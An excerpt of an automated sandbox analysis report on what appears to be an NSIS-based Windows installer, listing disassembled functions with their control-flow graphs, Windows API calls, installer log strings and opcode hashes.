CoTaskMemFree 561->565 562->561 563 4069b2-4069b9 562->563 567 4069c1-4069c3 563->567 564->554 565->552 565->564 567->552 567->561
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetVersion.KERNEL32(Completed,?,00000000,00404FD5,Completed,00000000,00426976,762323A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                              • GetSystemDirectoryW.KERNEL32(0046E220,00002004), ref: 00406984
                                                                                                                                                                                                                                                                                • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                              • GetWindowsDirectoryW.KERNEL32(0046E220,00002004), ref: 00406997
                                                                                                                                                                                                                                                                              • lstrcatW.KERNEL32(0046E220,\Microsoft\Internet Explorer\Quick Launch), ref: 00406A11
                                                                                                                                                                                                                                                                              • lstrlenW.KERNEL32(0046E220,Completed,?,00000000,00404FD5,Completed,00000000,00426976,762323A0,00000000), ref: 00406A73
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513431204.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513486557.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000445000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.00000000004A3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513725197.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                                                                                                                                                                                                                              • String ID: F$ F$Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                                                                                                                              • API String ID: 3581403547-498560682
                                                                                                                                                                                                                                                                              • Opcode ID: a604443cd83b579b0b32d0796c641f38e9c13ff519544ce5bb934e0b76d77e16
                                                                                                                                                                                                                                                                              • Instruction ID: 94ababd57b57874809535cfc920d07d17cc92350817822ff6505e5e4c02fddf3
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a604443cd83b579b0b32d0796c641f38e9c13ff519544ce5bb934e0b76d77e16
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9E71D6B1A00112ABDF20AF69CC44A7A3775AB55314F12C13BE907B66E0E73C89A1DB59
                                                                                                                                                                                                                                                                              Function 00406301 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513431204.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513486557.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000445000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.00000000004A3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513725197.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                                                              • String ID: jF
                                                                                                                                                                                                                                                                              • API String ID: 2295610775-3349280890
                                                                                                                                                                                                                                                                              • Opcode ID: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                                                                                                                                                                                              • Instruction ID: ae54cbf5f70e9060ab25dbcc7d0ddb8e13a77f3b50f8061b144b06f1ffcf0783
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C8D01231A141215BD7105778AD0C89B7E9CDF0A330366CA32F866F11F5D3348C2186ED
                                                                                                                                                                                                                                                                              Function 00406328 Relevance: 4.5, APIs: 3, Instructions: 18libraryloaderCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                                                              • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513431204.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513486557.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000445000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.00000000004A3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513725197.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 310444273-0
                                                                                                                                                                                                                                                                              • Opcode ID: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                                                                                                                                                                                                              • Instruction ID: 7c6873576e710d3586a353c563cf751ff2fc1cfd2ce2d1275f1b712779c4e249
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A8D01232200111D7C7005FA5AD48A5FB77DAE95A11706843AF902F3171E734D911E6EC
                                                                                                                                                                                                                                                                              Function 004015A0 Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351sleepfilewindowCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                                              control_flow_graph 56 4015a0-4015f4 57 4030e3-4030ec 56->57 58 4015fa 56->58 86 4030ee-4030f2 57->86 60 401601-401611 call 4062cf 58->60 61 401742-40174f 58->61 62 401962-40197d call 40145c GetFullPathNameW 58->62 63 4019ca-4019e6 call 40145c SearchPathW 58->63 64 40176e-401794 call 40145c call 4062cf SetFileAttributesW 58->64 65 401650-40166d call 40137e call 4062cf call 40139d 58->65 66 4017b1-4017d8 call 40145c call 4062cf call 405d85 58->66 67 401672-401686 call 40145c call 4062cf 58->67 68 401693-4016ac call 401446 call 4062cf 58->68 69 401715-401731 58->69 70 401616-40162d call 40145c call 4062cf call 404f9e 58->70 71 4016d6-4016db 58->71 72 401736-40173d 58->72 73 401897-4018a7 call 40145c call 406301 58->73 74 4018db-401910 call 40145c * 3 call 4062cf MoveFileW 58->74 75 40163c-401645 58->75 76 4016bd-4016d1 call 4062cf SetForegroundWindow 58->76 60->86 77 401751-401755 ShowWindow 61->77 78 401758-40175f 61->78 117 4019a3-4019a8 62->117 118 40197f-401984 62->118 63->57 123 4019ec-4019f8 63->123 64->57 136 40179a-4017a6 call 4062cf 64->136 65->86 160 401864-40186c 66->160 161 4017de-4017fc call 405d32 CreateDirectoryW 66->161 137 401689-40168e call 404f9e 67->137 142 4016b1-4016b8 Sleep 68->142 143 4016ae-4016b0 68->143 69->86 94 401632-401637 70->94 92 401702-401710 71->92 93 4016dd-4016fd call 401446 71->93 96 4030dd-4030de 72->96 138 4018c2-4018d6 call 4062cf 73->138 139 4018a9-4018bd call 4062cf 73->139 172 401912-401919 74->172 173 40191e-401921 74->173 75->94 95 401647-40164e PostQuitMessage 75->95 76->57 77->78 78->57 99 401765-401769 ShowWindow 78->99 92->57 93->57 94->86 95->94 96->57 113 4030de call 405f7d 96->113 99->57 113->57 130 4019af-4019b2 117->130 129 401986-401989 118->129 118->130 123->57 123->96 129->130 140 40198b-401993 call 406301 129->140 130->57 144 4019b8-4019c5 GetShortPathNameW 130->144 155 4017ab-4017ac 136->155 137->57 138->86 139->86 140->117 165 401995-4019a1 call 406035 140->165 142->57 143->142 144->57 155->57 163 401890-401892 160->163 164 40186e-40188b call 404f9e call 406035 SetCurrentDirectoryW 160->164 176 401846-40184e call 4062cf 161->176 177 4017fe-401809 GetLastError 161->177 163->137 164->57 165->130 172->137 178 401923-40192b call 406301 173->178 179 40194a-401950 173->179 192 401853-401854 176->192 182 401827-401832 GetFileAttributesW 177->182 183 40180b-401825 GetLastError call 4062cf 177->183 178->179 193 40192d-401948 call 406c94 call 404f9e 178->193 181 401957-40195d call 4062cf 179->181 181->155 190 401834-401844 call 4062cf 182->190 191 401855-40185e 182->191 183->191 190->192 191->160 191->161 192->191 193->181
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                                                                                                                                                                                                                              • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                                                                                                                                                                                                                              • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                                                                                                                                                                                                                              • ShowWindow.USER32(?), ref: 00401753
                                                                                                                                                                                                                                                                              • ShowWindow.USER32(?), ref: 00401767
                                                                                                                                                                                                                                                                              • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                                                                                                                                                                                                                              • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                                                                                                                                                                                                                              • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                                                                                                                                                                                                                              • SetCurrentDirectoryW.KERNELBASE(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                                                                                                                                                                                                                              • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                                                                                                                                                                                                                              • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                                                                                                                                                                                                                              • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                                                                                                                                                                                                                              • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              • Sleep(%d), xrefs: 0040169D
                                                                                                                                                                                                                                                                              • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                                                                                                                                                                                                                              • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                                                                                                                                                                                                                              • Call: %d, xrefs: 0040165A
                                                                                                                                                                                                                                                                              • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                                                                                                                                                                                                                              • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                                                                                                                                                                                                                              • Jump: %d, xrefs: 00401602
                                                                                                                                                                                                                                                                              • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                                                                                                                                                                                                                              • CreateDirectory: "%s" created, xrefs: 00401849
                                                                                                                                                                                                                                                                              • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                                                                                                                                                                                                                              • Aborting: "%s", xrefs: 0040161D
                                                                                                                                                                                                                                                                              • Rename on reboot: %s, xrefs: 00401943
                                                                                                                                                                                                                                                                              • SetFileAttributes failed., xrefs: 004017A1
                                                                                                                                                                                                                                                                              • Rename: %s, xrefs: 004018F8
                                                                                                                                                                                                                                                                              • detailprint: %s, xrefs: 00401679
                                                                                                                                                                                                                                                                              • Rename failed: %s, xrefs: 0040194B
                                                                                                                                                                                                                                                                              • BringToFront, xrefs: 004016BD
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513431204.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513486557.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000445000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.00000000004A3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513725197.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                                                                                                                                                                                                                              • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                                                                                                                                                                                                                              • API String ID: 2872004960-3619442763
                                                                                                                                                                                                                                                                              • Opcode ID: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                                                                                                                                                                                                              • Instruction ID: d546d874ac51cf0a7c72b7d7aee7a5a926bf82a1b22bfeef9e4f81a1fba4758f
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9EB1F435A00214ABDB10BFA1DD55DAE3F69EF44324B21817FF806B61E2DA3D4E40C66D
                                                                                                                                                                                                                                                                              Function 004054A5 Relevance: 48.3, APIs: 32, Instructions: 345windowstringCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                                              control_flow_graph 323 4054a5-4054b7 324 4055f9-405608 323->324 325 4054bd-4054c3 323->325 327 405657-40566c 324->327 328 40560a-405652 GetDlgItem * 2 call 403d6b SetClassLongW call 40141d 324->328 325->324 326 4054c9-4054d2 325->326 331 4054d4-4054e1 SetWindowPos 326->331 332 4054e7-4054ea 326->332 329 4056ac-4056b1 call 403ddb 327->329 330 40566e-405671 327->330 328->327 342 4056b6-4056d1 329->342 334 405673-40567e call 40139d 330->334 335 4056a4-4056a6 330->335 331->332 337 405504-40550a 332->337 338 4054ec-4054fe ShowWindow 332->338 334->335 356 405680-40569f SendMessageW 334->356 335->329 341 40594c 335->341 343 405526-405529 337->343 344 40550c-405521 DestroyWindow 337->344 338->337 351 40594e-405955 341->351 349 4056d3-4056d5 call 40141d 342->349 350 4056da-4056e0 342->350 346 40552b-405537 SetWindowLongW 343->346 347 40553c-405542 343->347 352 405929-40592f 344->352 346->351 354 4055e5-4055f4 call 403df6 347->354 355 405548-405559 GetDlgItem 347->355 349->350 359 4056e6-4056f1 350->359 360 40590a-405923 KiUserCallbackDispatcher * 2 350->360 352->341 357 405931-405937 352->357 354->351 361 405578-40557b 355->361 362 40555b-405572 SendMessageW IsWindowEnabled 355->362 356->351 357->341 364 405939-405942 ShowWindow 357->364 359->360 365 4056f7-405744 call 406831 call 403d6b * 3 GetDlgItem 359->365 360->352 366 405580-405583 361->366 367 40557d-40557e 361->367 362->341 362->361 364->341 393 405746-40574c 365->393 394 40574f-40578b ShowWindow KiUserCallbackDispatcher call 403db1 EnableWindow 365->394 372 405591-405596 366->372 373 405585-40558b 366->373 371 4055ae-4055b3 call 403d44 367->371 371->354 376 4055cc-4055df SendMessageW 372->376 378 405598-40559e 372->378 373->376 377 40558d-40558f 373->377 376->354 377->371 381 4055a0-4055a6 call 40141d 378->381 382 4055b5-4055be call 40141d 378->382 391 4055ac 381->391 382->354 390 4055c0-4055ca 382->390 390->391 391->371 393->394 397 405790 394->397 398 40578d-40578e 394->398 399 405792-4057c0 GetSystemMenu EnableMenuItem SendMessageW 397->399 398->399 400 4057c2-4057d3 SendMessageW 399->400 401 4057d5 399->401 402 4057db-405819 call 403dc4 call 406035 lstrlenW call 406831 SetWindowTextW call 40139d 400->402 401->402 402->342 411 40581f-405821 402->411 411->342 412 405827-40582b 411->412 413 40584a-40585e DestroyWindow 412->413 414 40582d-405833 412->414 413->352 416 405864-405891 CreateDialogParamW 413->416 414->341 415 405839-40583f 414->415 415->342 418 405845 415->418 416->352 417 405897-4058ee call 403d6b GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 40139d 416->417 417->341 423 4058f0-405903 ShowWindow call 403ddb 417->423 418->341 425 405908 423->425 425->352
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
                                                                                                                                                                                                                                                                              • ShowWindow.USER32(?), ref: 004054FE
                                                                                                                                                                                                                                                                              • DestroyWindow.USER32 ref: 00405512
                                                                                                                                                                                                                                                                              • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040552E
                                                                                                                                                                                                                                                                              • GetDlgItem.USER32(?,?), ref: 0040554F
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
                                                                                                                                                                                                                                                                              • IsWindowEnabled.USER32(00000000), ref: 0040556A
                                                                                                                                                                                                                                                                              • GetDlgItem.USER32(?,00000001), ref: 00405619
                                                                                                                                                                                                                                                                              • GetDlgItem.USER32(?,00000002), ref: 00405623
                                                                                                                                                                                                                                                                              • SetClassLongW.USER32(?,000000F2,?), ref: 0040563D
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
                                                                                                                                                                                                                                                                              • GetDlgItem.USER32(?,00000003), ref: 00405734
                                                                                                                                                                                                                                                                              • ShowWindow.USER32(00000000,?), ref: 00405756
                                                                                                                                                                                                                                                                              • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00405768
                                                                                                                                                                                                                                                                              • EnableWindow.USER32(?,?), ref: 00405783
                                                                                                                                                                                                                                                                              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
                                                                                                                                                                                                                                                                              • EnableMenuItem.USER32(00000000), ref: 004057A0
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
                                                                                                                                                                                                                                                                              • lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
                                                                                                                                                                                                                                                                              • SetWindowTextW.USER32(?,00451D98), ref: 00405808
                                                                                                                                                                                                                                                                              • ShowWindow.USER32(?,0000000A), ref: 0040593C
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513431204.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513486557.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000445000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.00000000004A3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513725197.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 3282139019-0
                                                                                                                                                                                                                                                                              • Opcode ID: b5207720c177ba42d53edf7a9f1d4aab61830a891a9918718410ffa1281e69e3
                                                                                                                                                                                                                                                                              • Instruction ID: f960999a9681c69a960cfafceaa395f4ab6c0ab2fcbff8166cb7657a87eea2d0
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b5207720c177ba42d53edf7a9f1d4aab61830a891a9918718410ffa1281e69e3
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 13C189B1500A04FBDB216F61ED89E2B7BA9EB49715F00093EF506B11F1C6399881DF2E
                                                                                                                                                                                                                                                                              Function 00405958 Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233stringregistrylibraryCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                                              control_flow_graph 426 405958-405970 call 406328 429 405972-405982 call 405f7d 426->429 430 405984-4059bc call 405eff 426->430 439 4059df-405a08 call 403ec1 call 4067aa 429->439 435 4059d4-4059da lstrcatW 430->435 436 4059be-4059cf call 405eff 430->436 435->439 436->435 444 405a9c-405aa4 call 4067aa 439->444 445 405a0e-405a13 439->445 451 405ab2-405ab9 444->451 452 405aa6-405aad call 406831 444->452 445->444 447 405a19-405a41 call 405eff 445->447 447->444 453 405a43-405a47 447->453 455 405ad2-405af7 LoadImageW 451->455 456 405abb-405ac1 451->456 452->451 457 405a49-405a58 call 405d32 453->457 458 405a5b-405a67 lstrlenW 453->458 460 405b92-405b9a call 40141d 455->460 461 405afd-405b3f RegisterClassW 455->461 456->455 459 405ac3-405ac8 call 403ea0 456->459 457->458 463 405a69-405a77 lstrcmpiW 458->463 464 405a8f-405a97 call 40674e call 406035 458->464 459->455 475 405ba4-405baf call 403ec1 460->475 476 405b9c-405b9f 460->476 466 405c61 461->466 467 405b45-405b8d SystemParametersInfoW CreateWindowExW 461->467 463->464 471 405a79-405a83 GetFileAttributesW 463->471 464->444 470 405c63-405c6a 466->470 467->460 477 405a85-405a87 471->477 478 405a89-405a8a call 40677d 471->478 484 405bb5-405bd2 ShowWindow LoadLibraryW 475->484 485 405c38-405c39 call 405073 475->485 476->470 477->464 477->478 478->464 486 405bd4-405bd9 LoadLibraryW 484->486 487 405bdb-405bed GetClassInfoW 484->487 491 405c3e-405c40 485->491 486->487 489 405c05-405c28 DialogBoxParamW call 40141d 487->489 490 405bef-405bff GetClassInfoW RegisterClassW 487->490 497 405c2d-405c36 call 403c94 489->497 490->489 492 405c42-405c48 491->492 493 405c5a-405c5c call 40141d 491->493 492->476 495 405c4e-405c55 call 40141d 492->495 493->466 495->476 497->470
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                                                                • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
